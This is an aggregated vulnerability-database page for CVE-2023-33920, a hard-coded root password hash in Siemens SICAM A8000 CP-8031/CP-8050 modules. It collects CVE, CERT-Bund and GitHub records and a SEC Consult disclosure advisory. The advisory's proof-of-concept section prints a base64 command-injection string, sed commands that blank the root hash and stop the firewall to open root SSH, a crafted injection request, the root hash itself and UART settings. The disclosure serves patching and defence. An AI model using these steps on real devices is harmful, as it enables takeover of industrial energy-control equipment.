cve-2023-33920

Vulnerability from cvelistv5

Published

2023-06-13 08:17

Modified

2025-02-13 16:55

Severity ?

6.8 (Medium) - CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C

Summary

A vulnerability has been identified in CP-8031 MASTER MODULE (All versions < CPCI85 V05), CP-8050 MASTER MODULE (All versions < CPCI85 V05). The affected devices contain the hash of the root password in a hard-coded form, which could be exploited for UART console login to the device. An attacker with direct physical access could exploit this vulnerability.

References

URL	Tags
productcert@siemens.com	http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html
productcert@siemens.com	http://seclists.org/fulldisclosure/2023/Jul/14
productcert@siemens.com	https://cert-portal.siemens.com/productcert/pdf/ssa-731916.pdf	Patch, Vendor Advisory

Impacted products

▼	Vendor	Product
	Siemens	CP-8031 MASTER MODULE
	Siemens	CP-8050 MASTER MODULE

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T15:54:13.387Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-731916.pdf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2023/Jul/14"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-33920",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-01-03T01:34:38.544377Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-01-03T01:35:55.952Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unknown",
          "product": "CP-8031 MASTER MODULE",
          "vendor": "Siemens",
          "versions": [
            {
              "status": "affected",
              "version": "All versions \u003c CPCI85 V05"
            }
          ]
        },
        {
          "defaultStatus": "unknown",
          "product": "CP-8050 MASTER MODULE",
          "vendor": "Siemens",
          "versions": [
            {
              "status": "affected",
              "version": "All versions \u003c CPCI85 V05"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability has been identified in CP-8031 MASTER MODULE (All versions \u003c CPCI85 V05), CP-8050 MASTER MODULE (All versions \u003c CPCI85 V05). The affected devices contain the hash of the root password in a hard-coded form, which could be exploited for UART console login to the device. An attacker with direct physical access could exploit this vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 6.8,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-798",
              "description": "CWE-798: Use of Hard-coded Credentials",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-07-11T17:06:23.541Z",
        "orgId": "cec7a2ec-15b4-4faf-bd53-b40f371f3a77",
        "shortName": "siemens"
      },
      "references": [
        {
          "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-731916.pdf"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Jul/14"
        },
        {
          "url": "http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cec7a2ec-15b4-4faf-bd53-b40f371f3a77",
    "assignerShortName": "siemens",
    "cveId": "CVE-2023-33920",
    "datePublished": "2023-06-13T08:17:19.819Z",
    "dateReserved": "2023-05-23T10:09:31.037Z",
    "dateUpdated": "2025-02-13T16:55:11.191Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2023-33920\",\"sourceIdentifier\":\"productcert@siemens.com\",\"published\":\"2023-06-13T09:15:18.677\",\"lastModified\":\"2023-07-11T18:15:16.023\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"A vulnerability has been identified in CP-8031 MASTER MODULE (All versions \u003c CPCI85 V05), CP-8050 MASTER MODULE (All versions \u003c CPCI85 V05). The affected devices contain the hash of the root password in a hard-coded form, which could be exploited for UART console login to the device. An attacker with direct physical access could exploit this vulnerability.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"attackVector\":\"PHYSICAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\",\"baseScore\":6.8,\"baseSeverity\":\"MEDIUM\"},\"exploitabilityScore\":0.9,\"impactScore\":5.9},{\"source\":\"productcert@siemens.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"attackVector\":\"PHYSICAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\",\"baseScore\":6.8,\"baseSeverity\":\"MEDIUM\"},\"exploitabilityScore\":0.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-798\"}]},{\"source\":\"productcert@siemens.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-798\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:siemens:cpci85_firmware:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"v05\",\"matchCriteriaId\":\"59D83EB4-A263-4070-A864-56EB7B120CE2\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:siemens:cp-8050_master_module:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E7686251-7011-46F9-9CEB-CC5DADCB5284\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:siemens:cpci85_firmware:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"v05\",\"matchCriteriaId\":\"59D83EB4-A263-4070-A864-56EB7B120CE2\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:siemens:cp-8031_master_module:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E84CEC33-3B34-42EF-A698-164AF0343316\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html\",\"source\":\"productcert@siemens.com\"},{\"url\":\"http://seclists.org/fulldisclosure/2023/Jul/14\",\"source\":\"productcert@siemens.com\"},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-731916.pdf\",\"source\":\"productcert@siemens.com\",\"tags\":[\"Patch\",\"Vendor Advisory\"]}]}}"
  }
}

gsd-2023-33920

Vulnerability from gsd

Modified

2023-12-13 01:20

Details

Aliases

CVE-2023-33920

Aliases

CVE-2023-33920

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2023-33920",
    "id": "GSD-2023-33920"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2023-33920"
      ],
      "details": "A vulnerability has been identified in CP-8031 MASTER MODULE (All versions \u003c CPCI85 V05), CP-8050 MASTER MODULE (All versions \u003c CPCI85 V05). The affected devices contain the hash of the root password in a hard-coded form, which could be exploited for UART console login to the device. An attacker with direct physical access could exploit this vulnerability.",
      "id": "GSD-2023-33920",
      "modified": "2023-12-13T01:20:36.585312Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "productcert@siemens.com",
        "ID": "CVE-2023-33920",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "CP-8031 MASTER MODULE",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "=",
                          "version_value": "All versions \u003c CPCI85 V05"
                        }
                      ]
                    }
                  },
                  {
                    "product_name": "CP-8050 MASTER MODULE",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "=",
                          "version_value": "All versions \u003c CPCI85 V05"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "Siemens"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "A vulnerability has been identified in CP-8031 MASTER MODULE (All versions \u003c CPCI85 V05), CP-8050 MASTER MODULE (All versions \u003c CPCI85 V05). The affected devices contain the hash of the root password in a hard-coded form, which could be exploited for UART console login to the device. An attacker with direct physical access could exploit this vulnerability."
          }
        ]
      },
      "impact": {
        "cvss": [
          {
            "baseScore": 6.8,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C",
            "version": "3.1"
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "cweId": "CWE-798",
                "lang": "eng",
                "value": "CWE-798: Use of Hard-coded Credentials"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://cert-portal.siemens.com/productcert/pdf/ssa-731916.pdf",
            "refsource": "MISC",
            "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-731916.pdf"
          },
          {
            "name": "http://seclists.org/fulldisclosure/2023/Jul/14",
            "refsource": "MISC",
            "url": "http://seclists.org/fulldisclosure/2023/Jul/14"
          },
          {
            "name": "http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:cpci85_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "v05",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:cp-8050_master_module:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:cpci85_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "v05",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:cp-8031_master_module:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "productcert@siemens.com",
          "ID": "CVE-2023-33920"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "A vulnerability has been identified in CP-8031 MASTER MODULE (All versions \u003c CPCI85 V05), CP-8050 MASTER MODULE (All versions \u003c CPCI85 V05). The affected devices contain the hash of the root password in a hard-coded form, which could be exploited for UART console login to the device. An attacker with direct physical access could exploit this vulnerability."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-798"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://cert-portal.siemens.com/productcert/pdf/ssa-731916.pdf",
              "refsource": "MISC",
              "tags": [
                "Patch",
                "Vendor Advisory"
              ],
              "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-731916.pdf"
            },
            {
              "name": "http://seclists.org/fulldisclosure/2023/Jul/14",
              "refsource": "MISC",
              "tags": [],
              "url": "http://seclists.org/fulldisclosure/2023/Jul/14"
            },
            {
              "name": "http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html",
              "refsource": "MISC",
              "tags": [],
              "url": "http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "PHYSICAL",
            "availabilityImpact": "HIGH",
            "baseScore": 6.8,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 0.9,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2023-07-11T18:15Z",
      "publishedDate": "2023-06-13T09:15Z"
    }
  }
}

wid-sec-w-2023-1430

Vulnerability from csaf_certbund

Published

2023-06-12 22:00

Modified

2023-06-12 22:00

Summary

Siemens SICAM: Mehrere Schwachstellen

Notes

Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.

Produktbeschreibung

Siemens SICAM ist eine Produktfamilie von SCADA-Systemen für den Betrieb von industriellen Prozessen.

Angriff

Ein Angreifer kann mehrere Schwachstellen in Siemens SICAM ausnutzen, um beliebigen Programmcode mit Administratorrechten auszuführen und Sicherheitsmaßnahmen zu umgehen.

Betroffene Betriebssysteme

- BIOS/Firmware

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "text": "mittel"
    },
    "category": "csaf_base",
    "csaf_version": "2.0",
    "distribution": {
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "de-DE",
    "notes": [
      {
        "category": "legal_disclaimer",
        "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
      },
      {
        "category": "description",
        "text": "Siemens SICAM ist eine Produktfamilie von SCADA-Systemen f\u00fcr den Betrieb von industriellen Prozessen.",
        "title": "Produktbeschreibung"
      },
      {
        "category": "summary",
        "text": "Ein Angreifer kann mehrere Schwachstellen in Siemens SICAM ausnutzen, um beliebigen Programmcode mit Administratorrechten auszuf\u00fchren und Sicherheitsma\u00dfnahmen zu umgehen.",
        "title": "Angriff"
      },
      {
        "category": "general",
        "text": "- BIOS/Firmware",
        "title": "Betroffene Betriebssysteme"
      }
    ],
    "publisher": {
      "category": "other",
      "contact_details": "csaf-provider@cert-bund.de",
      "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
      "namespace": "https://www.bsi.bund.de"
    },
    "references": [
      {
        "category": "self",
        "summary": "WID-SEC-W-2023-1430 - CSAF Version",
        "url": "https://wid.cert-bund.de/.well-known/csaf/white/2023/wid-sec-w-2023-1430.json"
      },
      {
        "category": "self",
        "summary": "WID-SEC-2023-1430 - Portal Version",
        "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-1430"
      },
      {
        "category": "external",
        "summary": "Siemens Security Advisory vom 2023-06-12",
        "url": "https://cert-portal.siemens.com/productcert/html/ssa-731916.html"
      }
    ],
    "source_lang": "en-US",
    "title": "Siemens SICAM: Mehrere Schwachstellen",
    "tracking": {
      "current_release_date": "2023-06-12T22:00:00.000+00:00",
      "generator": {
        "date": "2024-08-15T17:52:17.822+00:00",
        "engine": {
          "name": "BSI-WID",
          "version": "1.3.5"
        }
      },
      "id": "WID-SEC-W-2023-1430",
      "initial_release_date": "2023-06-12T22:00:00.000+00:00",
      "revision_history": [
        {
          "date": "2023-06-12T22:00:00.000+00:00",
          "number": "1",
          "summary": "Initiale Fassung"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_name",
                "name": "Siemens SICAM A800 CP-8031 \u003c CPCI85",
                "product": {
                  "name": "Siemens SICAM A800 CP-8031 \u003c CPCI85",
                  "product_id": "T028073",
                  "product_identification_helper": {
                    "cpe": "cpe:/h:siemens:sicam:a800_cp-8031__cpci85"
                  }
                }
              },
              {
                "category": "product_name",
                "name": "Siemens SICAM A800 CP-8050 \u003c CPCI85",
                "product": {
                  "name": "Siemens SICAM A800 CP-8050 \u003c CPCI85",
                  "product_id": "T028074",
                  "product_identification_helper": {
                    "cpe": "cpe:/h:siemens:sicam:a800_cp-8050__cpci85"
                  }
                }
              }
            ],
            "category": "product_name",
            "name": "SICAM"
          }
        ],
        "category": "vendor",
        "name": "Siemens"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2023-33921",
      "notes": [
        {
          "category": "description",
          "text": "In Siemens SICAM existieren mehrere Schwachstellen. Der Fehler besteht in der Verwendung eines fest kodierten Berechtigungsnachweises und in der Offenlegung einer gef\u00e4hrlichen Funktion. Ein physischer Angreifer kann diese Schwachstellen ausnutzen, um die Sicherheitsma\u00dfnahmen zu umgehen."
        }
      ],
      "release_date": "2023-06-12T22:00:00.000+00:00",
      "title": "CVE-2023-33921"
    },
    {
      "cve": "CVE-2023-33920",
      "notes": [
        {
          "category": "description",
          "text": "In Siemens SICAM existieren mehrere Schwachstellen. Der Fehler besteht in der Verwendung eines fest kodierten Berechtigungsnachweises und in der Offenlegung einer gef\u00e4hrlichen Funktion. Ein physischer Angreifer kann diese Schwachstellen ausnutzen, um die Sicherheitsma\u00dfnahmen zu umgehen."
        }
      ],
      "release_date": "2023-06-12T22:00:00.000+00:00",
      "title": "CVE-2023-33920"
    },
    {
      "cve": "CVE-2023-33919",
      "notes": [
        {
          "category": "description",
          "text": "Es existiert eine Schwachstelle in Siemens SICAM. Der Fehler besteht aufgrund einer fehlenden serverseitigen Eingabesanierung. Ein entfernter, authentisierter Angreifer kann diese Schwachstelle zur Ausf\u00fchrung von beliebigem Code mit Root-Rechten ausnutzen."
        }
      ],
      "release_date": "2023-06-12T22:00:00.000+00:00",
      "title": "CVE-2023-33919"
    }
  ]
}

ghsa-mqj9-w9ch-6xmr

Vulnerability from github

Published

2023-06-13 09:30

Modified

2024-04-04 04:46

Severity ?

6.8 (Medium) - CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2023-33920"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-13T09:15:18Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability has been identified in CP-8031 MASTER MODULE (All versions \u003c CPCI85 V05), CP-8050 MASTER MODULE (All versions \u003c CPCI85 V05). The affected devices contain the hash of the root password in a hard-coded form, which could be exploited for UART console login to the device. An attacker with direct physical access could exploit this vulnerability.",
  "id": "GHSA-mqj9-w9ch-6xmr",
  "modified": "2024-04-04T04:46:05Z",
  "published": "2023-06-13T09:30:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33920"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-731916.pdf"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2023/Jul/14"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

var-202306-0923

Vulnerability from variot

A vulnerability has been identified in CP-8031 MASTER MODULE (All versions < CPCI85 V05), CP-8050 MASTER MODULE (All versions < CPCI85 V05). The affected devices contain the hash of the root password in a hard-coded form, which could be exploited for UART console login to the device. An attacker with direct physical access could exploit this vulnerability. The SICAM A8000 RTUs (Remote Terminal Units) series is a series of modular devices for remote control and automation applications in all areas of energy supply. SEC Consult Vulnerability Lab Security Advisory < 20230703-0 >

           title: Multiple Vulnerabilities including Unauthenticated RCE
         product: Siemens A8000 CP-8050 MASTER MODULE (6MF2805-0AA00)
                  Siemens A8000 CP-8031 MASTER MODULE (6MF2803-1AA00)

vulnerable version: <= V04.92 fixed version: CPCI85 V05 CVE number: CVE-2023-28489, CVE-2023-33919, CVE-2023-33920, CVE-2023-33921 impact: Critical homepage: https://www.siemens.com found: 2023-02-15 by: Stefan Viehböck (Office Vienna) Christian Hager (Office Vienna) Steffen Robertz (Office Vienna) Gerhard Hechenberger (Office Vienna) Gorazd Jank (Office Vienna) Constantin Schieber-Knoebl (Office Vienna) SEC Consult Vulnerability Lab

                  An integrated part of SEC Consult, an Eviden business
                  Europe | Asia

                  https://www.sec-consult.com

=======================================================================

Vendor description:

"We are a technology company focused on industry, infrastructure, transport, and healthcare. From more resource-efficient factories, resilient supply chains, and smarter buildings and grids, to cleaner and more comfortable transportation as well as advanced healthcare, we create technology with purpose adding real value for customers."

Source: https://new.siemens.com/global/en/company/about.html

Business recommendation:

The vendor provides a patch which should be installed immediately. Customers should update to CPCI85 V05 or later version. (https://support.industry.siemens.com/cs/ww/en/view/109804985/)

SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues.

Vulnerability overview/description:

1) Unauthenticated Remote Code Execution (CVE-2023-28489) By sending an HTTP request with a crafted header to port 80/443 of the PLC, arbitrary commands can be executed as system user. The port is used to configure and control Siemens PLCs with the Siemens Toolbox II application and is typically accessible on such devices.

2) Authenticated Command Injection (CVE-2023-33919) Due to missing server-side input sanitation, any user with access to the SICAM WEB interface can execute arbitrary commands as user "root" on the device. This works by setting malicious parameters and starting an Ethernet package capture. This password hash is the same on all devices. If the corresponding password is known, it could be used to login via UART and SSH.

4) Console Login via UART (CVE-2023-33921) The UART interface can be accessed with physical access to the PCB. After connecting to the interface, boot information is given and a login prompt is provided.

Proof of concept:

1) Unauthenticated Remote Code Execution (CVE-2023-28489) To exploit this vulnerability, an HTTP request including the command must be crafted. No "/" characters can be used, therefore commands are encoded as base64, e.g., "id" as "aWQ=". The command must be provided as UPLOADFILENAME header. A full command looks as follows:

;echo aWQ=| base64 -d | sh #

The following header format must be obeyed: * User-Agent: SICAM TOOLBOX II * Session-ID: [ARBITRARY 16 CHARACTERS] * UPLOADFILENAME: [COMMAND]

Additionally, the request body must contain the following POST parameters: * type=20 * length=[ARBITRARY] * data=[ARBITRARY]

A valid request can be seen below:

[ POC request removed ]

If it worked, the response body will be "type=21". Additionally, the output on the UART interface indicates code execution as root user:

base64: /ies/IN/_: No such file or directory uid=0(root) gid=0(root)

Subsequently, the SSH port can be opened by sending the following commands separately and encoded as base64 string. They will replace the set default root password hash with an empty password hash, reconfigure the Dropbear SSH daemon and stop the firewall:

sed -i s'/:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo\/FWtDljQjCbm6JnZqxiMg re5P14Kv2zAH1:/:32BZgrJ3XBMoY:/' /etc/shadow sed -i s'/"$DROPBEAR_ARGS -R -s -g"/"$DROPBEAR_ARGS -R"/' /etc/init.d/dropbear /etc/init.d/dropbear restart /etc/init.d/rc.firewall stop

After this, login via SSH as root is possible:

ssh root@[IP] root@[IP]'s password: ~# id uid=0(root) gid=0(root) groups=0(root),10(wheel) ~#

2) Authenticated Command Injection (CVE-2023-33919) To trigger the command injection vulnerability, the payload must be set in the "LAN port group" field on the SICAM WEB page "Monitoring & Simulation" -> "Ethernet Packet Capture" section "Capture configuration" (other fields may also be affected). As the web interface only provides a drop-down menu, the payload must be set by manipulating the JavaScript logic or by directly manipulating the HTTP request as below, where "ping [IP]\nBBBBBBB" was set:

POST /sicweb-ajax/rtum85/cview HTTP/1.1 Host: [HOST] User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/xml SICWEB-SID: xNG1v825qFmCMo8hpjfISlVARKipW1B+lz9d5FoBxipR87VT Content-Length: 198 Origin: http://[HOST] Connection: close Referer: http://[HOST]/

ping [IP] BBBBBBB

The line break in the payload is especially important, as the command is executed as part of a shell script. This script is generated and executed by pressing the "Start/Stop trace" button in the "Capture Controlling" section and saved as /tmp/incws_tcpdump.sh. An excerpt with the injected command is shown below:

[...] # lets start tcpdump tcpdump -i ping [IP] BBBBBBB '(ether host 00:11:11:33:44:00) and (host 1.1.1.2 or host 2.2.2.34) and (port 999)' -C 1 -W 4 -U -w /var/log/wireshark.pcap & [...]

The executed script creates a process running as root user, which can be seen by running "ps" on the device:

root 1100 0.0 0.1 1784 1168 ? S Feb21 0:00 /bin/sh /etc/init.d/rc.sysinit root 1149 0.1 0.3 11768 1748 ? S1 Feb21 6:03 _ /ies/apps/system/bin/ISV00.elf /ies/apps/sys_desc/target_rc.json [...] www-data 1487 0.0 0.6 7568 3444 ? S Feb21 0:40 _ /usr/sbin/lighttpd -Df /etc/lighttpd/lighttpd.conf root 10655 0.0 0.2 1880 1344 ? S 04:55 0:00 _ /bin/sh /tmp/incws_tcpdump.sh root 10667 0.0 0.2 1884 1360 ? S 04:57 0:00 _ ping [IP]

3) Hard-coded Root Password (CVE-2023-33920) A hard-coded "root" user password hash can be found in the /etc/shadow file:

root:$6$jNY7stPOMCNi$bMqOCQX0ClFK3PyNPUyDvuF2xKOJ8j00v79.wXGV0BG7cxKc8aCo/FWtDljQjCbm6JnZqxiMg re5P14Kv2zAH1:16436:0:99999:7:::

4) Console Login via UART (CVE-2023-33921) The serial console (UART) can be accessed on the backside of the PCB on two Vias. After removing an additional logic IC, receiving data and sending data is possible with the following UART settings: * Voltage: 3.3V * Speed: 115200 Baud * Symbol-ratio: 8 Data Bits 1 Stop Bit (8N1) Extensive boot log output can be received. Some output is shown below:

U-Boot SPL 2013.01.01 (Jan 16 2020 - 12:56:02) BOARD : Altera SOCFPGA Cyclone V Board CLOCK: EOSC1 clock 50000 KHz [...] Starting IES system

Welcome to SICAM IES

Welcome to _. __ __ ___ ._ ___.

Vulnerable / tested versions:

The following product has been tested: * Siemens A8000 CP-8050 04.92 * Siemens A8000 CP-8031 04.92

Vendor contact timeline:

2023-03-14: Contacting vendor through productcert@siemens.com, sending encrypted advisory 2023-03-29: Naming researchers involved 2023-03-31: Requesting state. Vulnerability 1 will be published first due to criticality. Rest will follow. 2023-04-11: Siemens releases advisory for unauthenticated RCE (Vulnerability 1, CVE-2023-28489) 2023-06-13: Siemens releases advisory for vulnerability 2, 3 and 4 (CVE-2023-33919, CVE-2023-33920, CVE-2023-33921) 2023-06-21: Siemens has additional feedback regarding the contents of the advisory. 2023-07-03: Release of security advisory.

Solution:

Update to firmware CPCI85 V05 or later version, see vendor advisory for further information: https://cert-portal.siemens.com/productcert/html/ssa-472454.html https://cert-portal.siemens.com/productcert/html/ssa-731916.html

Workaround:

Restrict network access to the A8000 CP-8050/CP8031 module or disable the Toolbox II communication on port 80/443. Make sure to strictly limit physical access to the PLC during and also after its life cycle.

Advisory URL:

